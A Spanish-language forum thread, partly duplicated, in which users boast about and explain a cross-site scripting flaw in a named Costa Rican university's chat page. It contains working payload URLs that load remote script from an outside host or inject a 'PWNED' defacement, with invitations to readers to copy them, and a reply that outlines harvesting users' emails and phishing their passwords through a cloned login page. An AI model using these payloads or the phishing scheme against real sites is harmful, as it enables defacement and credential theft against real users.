que se supone que es eso?
Follow along with the video below to see how to install our site as a web app on your home screen.
Nota: This feature may not be available in some browsers.
que se supone que es eso?
jajaja si ( muy obvio ) pero que?<script>alert("")</script>
Eso.
Hacking Costa Rica - Índice nueva comunidad hacking de costa rica
jaja ya pirateó el Powered by SMF 1.1.12?
No sé porqué esto me recordo cuando hackearon a PHPBB.
Y no fue gracioso, menos porque hackear a una pagina sin fines de lucro que beneficia el crecimiento de internet fue extramadamente retard.
jaja ya pirateó el Powered by SMF 1.1.12?
Ya puedo abrir un tema ahí que diga ''hackiemos foro de costarica?
Mae donde apendió todo eso? Que es que ya sacó alguna profesión sobre algo de informática? o que son cursos que se tomo o lo aprendió de la internet? Mae porque a mi me super cuadran esas varas y me gustaría saber
leer.. mucho tener paciencia.. no no hice ningun curso, eso no lo enseñan.. en todos lados solo te dan bases, luego lo que tu quieras es cosa de uno mismo. =)
osea todo lo aprendio en la internet? Mae me puede pasar unas paginas o de donde halla aprendido esas varas?
mira.. te explico lo siguiente son cosas muy grandes.. pero todo esta marcado por categorias.. programacion, seguridad, etc etc.. todo esta en lo que en si quieras aprender.. y bueno.. yo quiero que todos aprendan ya que el verdadera fuerza, no esta en solo 1 persona.. sino en la colectividad.. ya que cada mente es un mundo.. y nadie piensa igual es mas facil "cortar un arbol entre 2 personas a la vez, que uno solo" en lo que tengas dudas solo pregunta, que si puedo con gusto te ayudaré.. por cualquier cosas mi msn es [email protected]osea todo lo aprendio en la internet? Mae me puede pasar unas paginas o de donde halla aprendido esas varas?
hola, bueno para eso ahi muchas aplicaciones, yo uso el MetaSploit Framework, si queres agregame y te ayudo en lo que pueda [email protected] saludos..Viejo muy interesante toda esta info me gustaria pareder mas de este tipo de cosas, tengo una duda que utilizaste para revisar(scanear) los puertos de la pagina????
Me presento soy James Jara leader de tecnologia y seguridad informatica.
jaja es mi primer palabra.. primero que todo esto no es un hack, mucho menos un intrusion al servidor de Fidelitas. Esto es la cosa mas NOOB que el mundo puede ver.pero animo un dia lo lograras.
Como podemos ver el amateur hace un scann , simple. no significa nada,es gratis.
Luego seguramente ud hace un scan nivel web puerto 80, luego este scan le dice que ese chat tiene una vulnerabilidad : correcto. pero de que esto sea hacking es otra cosa.
Este vulnerabilidad no significa nada grave, ya que no puede INGRESAR EN EL SERVIDOR , es una vulnerabilidad de lado cliente, quiero decir los exploradores webs ya sea firefox, mozilla, chrome, iexplorer. por lo cual se a de llamar vulnerabilidad XSS, en ningun momento sera vulnerabilidad de inyec html al servidor xq ese servidor ud jamas lo toca.
Las xss es tan simple como copiar este texto y pegarlo en la barra del explorador web respecto javascript:alert('me autohackie'); y pensar que te auto hackeaste:
Explico el problema
Lo que hjace esta pagina es leer un archivo, ahora que pasa si le cambios la ruta a ese archivo por una nuestra.
pagina:
http://www.ufidelitas.ac.cr/chat/image.php?=ruta archivo original
noobed:
http://www.ufidelitas.ac.cr/chat/image.php?=ruta archivo malicioso
simple no hacking.
Entonces con solo tener subido al internet una pagina l aponemos ahi , DAMOS EL ENLACE Y LISTO.
http://www.ufidelitas.ac.cr/chat/image.php?l=1</script>2]<script src=http://k0jub0t.webcindario.com/k0jun0%3E%3C/script%3E%3C/script%3E2]%3Cscript%20src=http://k0jub0t.webcindario.com/k0j%3E%3C/script%3E
PORQUE NO ES HACKING?
porque esto no exist y no pasa en ningun lado, solo en el CLICK, osea el enlace esta puesto en el click, osea que si ustedes entran a
http://www.ufidelitas.ac.cr/chat/image.php NO VERAN NADA DE NADA. por lo cual esto no es hacking.
CLICK AQUI PARA VER UN SUPUESTO HACKING MIO
AHORA QUIEREN USTEDES HACER ESTO , es simple si sabenm algo basico de html mejor
Modifique donde dice modificar texto, y luego copien y peguen todo en la barra de navegacvion, incluyxo pueden agregar el enlace aqui y todo seremos hackers.
en lo que esta de color verde pueden meter una imagen, la URL de una imagen.
En lo que esta de color rojo pueden meter texto y html, no metan comillas.
Linkk:
http://www.ufidelitas.ac.cr/chat/image.php?l=1</script>2]<script>document.write('<img src=http://img517.imageshack.us/img517/4194/user43299pic21621208410.jpg><center> PWNED, turk team legion 43 cr james jara 3ple-j </center>"<body bgcolor="black">');</script>
bueno y en todo caso man va xel buen camino jajaja, si ud quiere es bienvenido, yo recluto hackers , informaticos, y todo tipo de varas jaja PAZZZZ buena vibra
jajaja.. primero perdonen por no rsponder mas, solo que no estoy en cr,estoy en colombia de vacaciones y sinceramente ya se me habia olvidado esto pero en fin.. juajua vamos pues, dices que no es hacking eh ? okay te explico, aunque tu explicacion no esta mal, si te equivocaste en el punto mas importante, el xss si es una vulnerabilidad por lo tanto es explotable yo en mi caso al sacarla solo le incruste html, pero bien hubiese podido bajarme una lista de usuarios, e emails de esa web y hubiese podido mandar emails, de remitente ufidelitas solicitando cualquier tipo de informacion, redireccionando a los usuarios a una pagina clon de la ufidelitas ( que es extremadamente facil hacerlo, y modificando un poco los campos de user y pass los redirecciono a un servidor web, al momento de mandar la peticion que en este caso seria http) y asi facilmente tendria acceso a todas las cuentas de usuarios de esa universidad xD!) pero no me DIO la gana de hacerlo asi, solo demostrar que habia xss en esa webMe presento soy James Jara leader de tecnologia y seguridad informatica.
jaja es mi primer palabra.. primero que todo esto no es un hack, mucho menos un intrusion al servidor de Fidelitas. Esto es la cosa mas NOOB que el mundo puede ver.pero animo un dia lo lograras.
Como podemos ver el amateur hace un scann , simple. no significa nada,es gratis.
Luego seguramente ud hace un scan nivel web puerto 80, luego este scan le dice que ese chat tiene una vulnerabilidad : correcto. pero de que esto sea hacking es otra cosa.
Este vulnerabilidad no significa nada grave, ya que no puede INGRESAR EN EL SERVIDOR , es una vulnerabilidad de lado cliente, quiero decir los exploradores webs ya sea firefox, mozilla, chrome, iexplorer. por lo cual se a de llamar vulnerabilidad XSS, en ningun momento sera vulnerabilidad de inyec html al servidor xq ese servidor ud jamas lo toca.
Las xss es tan simple como copiar este texto y pegarlo en la barra del explorador web respecto javascript:alert('me autohackie'); y pensar que te auto hackeaste:
Explico el problema
Lo que hjace esta pagina es leer un archivo, ahora que pasa si le cambios la ruta a ese archivo por una nuestra.
pagina:
http://www.ufidelitas.ac.cr/chat/image.php?=ruta archivo original
noobed:
http://www.ufidelitas.ac.cr/chat/image.php?=ruta archivo malicioso
simple no hacking.
Entonces con solo tener subido al internet una pagina l aponemos ahi , DAMOS EL ENLACE Y LISTO.
http://www.ufidelitas.ac.cr/chat/image.php?l=1</script>2]<script src=http://k0jub0t.webcindario.com/k0jun0%3E%3C/script%3E%3C/script%3E2]%3Cscript%20src=http://k0jub0t.webcindario.com/k0j%3E%3C/script%3E
PORQUE NO ES HACKING?
porque esto no exist y no pasa en ningun lado, solo en el CLICK, osea el enlace esta puesto en el click, osea que si ustedes entran a
http://www.ufidelitas.ac.cr/chat/image.php NO VERAN NADA DE NADA. por lo cual esto no es hacking.
CLICK AQUI PARA VER UN SUPUESTO HACKING MIO
AHORA QUIEREN USTEDES HACER ESTO , es simple si sabenm algo basico de html mejor
Modifique donde dice modificar texto, y luego copien y peguen todo en la barra de navegacvion, incluyxo pueden agregar el enlace aqui y todo seremos hackers.
en lo que esta de color verde pueden meter una imagen, la URL de una imagen.
En lo que esta de color rojo pueden meter texto y html, no metan comillas.
Linkk:
http://www.ufidelitas.ac.cr/chat/image.php?l=1</script>2]<script>document.write('<img src=http://img517.imageshack.us/img517/4194/user43299pic21621208410.jpg><center> PWNED, turk team legion 43 cr james jara 3ple-j </center>"<body bgcolor="black">');</script>
bueno y en todo caso man va xel buen camino jajaja, si ud quiere es bienvenido, yo recluto hackers , informaticos, y todo tipo de varas jaja PAZZZZ buena vibra
📑 Evite Incurrir en Multas y Sanciones: Ofrecemos servicios de presentación de declaraciones de IVA (D104), alquileres (D125) y la anual de renta (D101)
🦉Prepración para examenes desde 6to hasta Bachillerato por madurez.
¡Obtenga su título!
🚀 FACTURATica.com la #1 sin Mensualidades ni Anualidades. Inscripción gratis en Hacienda.